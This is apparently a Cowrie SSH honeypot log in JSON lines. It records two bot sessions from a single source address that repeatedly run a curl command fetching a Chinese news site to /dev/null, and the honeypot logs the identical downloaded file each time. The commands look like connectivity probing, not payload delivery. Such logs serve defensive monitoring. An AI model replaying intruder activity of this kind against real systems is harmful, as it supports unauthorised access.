{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.184304Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.194902Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.196126Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.198899Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.199959Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.236831Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.237911Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.240680Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.242375Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.255252Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.276355Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.280157Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.281143Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.284242Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.285242Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.298175Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.321315Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.325065Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.334934Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.335978Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.338492Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.340464Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.376959Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.377923Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.380296Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.381490Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.416920Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.418455Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.421452Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.422742Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.462707Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.464159Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.466568Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.468321Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.474036Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.495958Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.511419Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.512784Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.516816Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.518097Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.520609Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.554517Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.558035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.559098Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.595703Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.596751Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.601209Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.629491Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.633005Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.636035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.637169Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.643618Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.653351Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.663053Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.675233Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.676466Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.684293Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.686313Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.714148Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.715192Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.719346Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.752300Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.753609Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.765014Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.768531Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.773862Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.781682Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.787037Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.788970Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.790233Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.797913Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.799023Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.803777Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.826513Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.827752Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.834737Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.835948Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.839099Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.845261Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.846637Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.866804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.868041Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:12.880054Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:12.881057Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
